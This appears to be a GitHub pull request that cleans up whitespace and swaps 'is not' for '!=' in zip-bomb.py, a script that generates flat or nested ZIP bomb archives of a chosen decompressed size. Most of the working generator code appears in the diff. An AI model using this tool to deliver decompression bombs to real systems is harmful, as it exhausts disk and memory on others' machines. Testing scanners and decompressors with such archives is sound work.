### PR TITLE
Remove useless tabs and spaces

### DIFF
--- a/zip-bomb.py
+++ b/zip-bomb.py
@@ -167,8 +167,8 @@ if __name__ == '__main__':
 
 	out_zip_file = args.out_zip_file
 
-	include_dirs = [d.strip() for d in args.dirs.strip().split(',') if d is not '']
-	include_files = [d.strip() for d in args.files.strip().split(',') if d is not '']
+	include_dirs = [d.strip() for d in args.dirs.strip().split(',') if d != '']
+	include_files = [d.strip() for d in args.files.strip().split(',') if d != '']
 
 	start_time = time.time()
 	if args.mode == 'flat':

--- a/zip-bomb.py
+++ b/zip-bomb.py
@@ -8,12 +8,12 @@ import shutil
 import sys
 import time
 import argparse
-	
+
 def generate_dummy_file(filename, size):
 	with open(filename,'w') as dummy:
 		dummy.write((size*1024*1024)*'0')
 
-	
+
 def make_copies_and_compress(zf, infile, n_copies):
 	for i in range(n_copies):
 		extension = infile[infile.rfind('.')+1:]
@@ -22,8 +22,8 @@ def make_copies_and_compress(zf, infile, n_copies):
 		shutil.copy(infile,f_name)
 		zf.write(f_name, compress_type=zipfile.ZIP_DEFLATED)
 		os.remove(f_name)
-	
-	
+
+
 def add_file_to_zip(zf, path, include_dir=True):
 	"""Add directory to zip file"""
 	if os.path.isfile(path):
@@ -37,31 +37,31 @@ def add_file_to_zip(zf, path, include_dir=True):
 					arc_root = arc_root[1:]
 			for file in files:
 				zf.write(os.path.join(root, file), arcname=os.path.join(arc_root, file))
-				
-	
+
+
 def make_zip_flat(size, out_file, include_dirs, include_files):
 	"""
 	Creates flat zip file without nested zips.
 	Zip contains n files each of size size/n and is saved in out_file.
 	"""
 	dummy_name_format = 'dummy{}.txt'
-		
+
 	files_nb = int(size / 100)
 	file_size = int(size / files_nb)
 	last_file_size = size - (file_size * files_nb)
-	
+
 	if os.path.isfile(out_zip_file):
 		os.remove(out_zip_file)
-		
+
 	zf = zipfile.ZipFile(out_file, mode='w', allowZip64=True)
-	
+
 	# Include selected dirs
 	for f in include_dirs:
 		add_file_to_zip(zf, f, include_dir=False)
 	for f in include_files:
 		add_file_to_zip(zf, f)
-		
-	# Generate and add dummy big files	
+
+	# Generate and add dummy big files
 	if files_nb > 0:
 		for i in range(files_nb):
 			dummy_name = dummy_name_format.format(i)
@@ -71,8 +71,8 @@ def make_zip_flat(size, out_file, include_dirs, include_files):
 				os.rename(dummy_name_format.format(i-1), dummy_name)
 			zf.write(dummy_name, compress_type=zipfile.ZIP_DEFLATED)
 		os.remove(dummy_name)
-	
-	
+
+
 	if last_file_size > 0:
 		dummy_name = dummy_name_format.format(files_nb)
 		generate_dummy_file(dummy_name, last_file_size)
@@ -80,12 +80,12 @@ def make_zip_flat(size, out_file, include_dirs, include_files):
 		os.remove(dummy_name)
 	zf.close()
 	return files_nb * file_size
-	
+
 
 def get_files_depth_and_size(total_size):
-	""" 
+	"""
 	Finds a pair of files depth and file size close to given size.
-	Idea is to keep both values balanced so there is no situation 
+	Idea is to keep both values balanced so there is no situation
 	in which there is gazillion files of size 2MB or one file of 1TB
 	"""
 	files_nb = 1
@@ -106,8 +106,8 @@ def get_files_depth_and_size(total_size):
 			file_size = new_file_size
 		actual_size = files_nb**files_nb * file_size
 	return files_nb, file_size
-		
-	
+
+
 def make_zip_nested(size_MB, out_zip_file, include_dirs, include_files):
 	"""
 	Creates nested zip file (zip file of zip files of zip files etc.).
@@ -115,11 +115,11 @@ def make_zip_nested(size_MB, out_zip_file, include_dirs, include_files):
 	if size_MB < 500:
 		print('Warning: too small size, using flat mode.')
 		return make_zip_flat(size_MB, out_zip_file)
-	
+
 	depth, file_size = get_files_depth_and_size(size_MB)
 	actual_size = depth**depth*file_size 
 	print('Warning: Using nested mode. Actual size may differ from given.')
-	
+
 	# Prototype zip file
 	dummy_name = 'dummy.txt'
 	generate_dummy_file(dummy_name, file_size)
@@ -127,7 +127,7 @@ def make_zip_nested(size_MB, out_zip_file, include_dirs, include_files):
 	zf.write(dummy_name, compress_type=zipfile.ZIP_DEFLATED)
 	zf.close()
 	os.remove(dummy_name)
-	
+
 	for i in range(1,depth+1):
 		zf = zipfile.ZipFile('%d.zip'%(i+1), mode='w', allowZip64=True)
 		make_copies_and_compress(zf, '%d.zip'%i,depth)
@@ -137,39 +137,39 @@ def make_zip_nested(size_MB, out_zip_file, include_dirs, include_files):
 			for f in include_dirs:
 				add_file_to_zip(zf, f, include_dir=False)
 			for f in include_files:
-				add_file_to_zip(zf, f)	
+				add_file_to_zip(zf, f)
 		zf.close()
 	if os.path.isfile(out_zip_file):
 		os.remove(out_zip_file)
 	os.rename('%d.zip'%(depth+1),out_zip_file)
 	return actual_size
-	
+
 
 def help_epilog():
 	return """mode of compression options:
   flat - flat zip file with contents
   nested - nested zip file, zip of zips of zips ... (much smaller) """
-	
-	
+
+
 if __name__ == '__main__':
 
-	parser = argparse.ArgumentParser(description='Creates ZIP bomb archive.', 
+	parser = argparse.ArgumentParser(description='Creates ZIP bomb archive.',
 				formatter_class=argparse.RawDescriptionHelpFormatter, epilog=help_epilog())
-	parser.add_argument('-d', '--dirs', action='store', 
+	parser.add_argument('-d', '--dirs', action='store',
 		help='add directory contents to ZIP file. multiple directiroes separated with comma', default='')
-	parser.add_argument('-f', '--files', action='store', 
+	parser.add_argument('-f', '--files', action='store',
 		help='add files (can be directory) to ZIP file. multiple files separated with comma', default='')
 	parser.add_argument('mode', help='mode of compression. see choices description below', choices=('flat', 'nested'))
 	parser.add_argument('size', help='decompression size in MB', type=int)
 	parser.add_argument('out_zip_file', help='path to destination file')
-	
+
 	args = parser.parse_args()
-	
+
 	out_zip_file = args.out_zip_file
-	
+
 	include_dirs = [d.strip() for d in args.dirs.strip().split(',') if d is not '']
 	include_files = [d.strip() for d in args.files.strip().split(',') if d is not '']
-	
+
 	start_time = time.time()
 	if args.mode == 'flat':
 		actual_size = make_zip_flat(args.size, out_zip_file, include_dirs, include_files)


### PR DESCRIPTION
I Fixed:
- Remove useless tabs and spaces
- Avoid `SyntaxWarning` in Python 3.8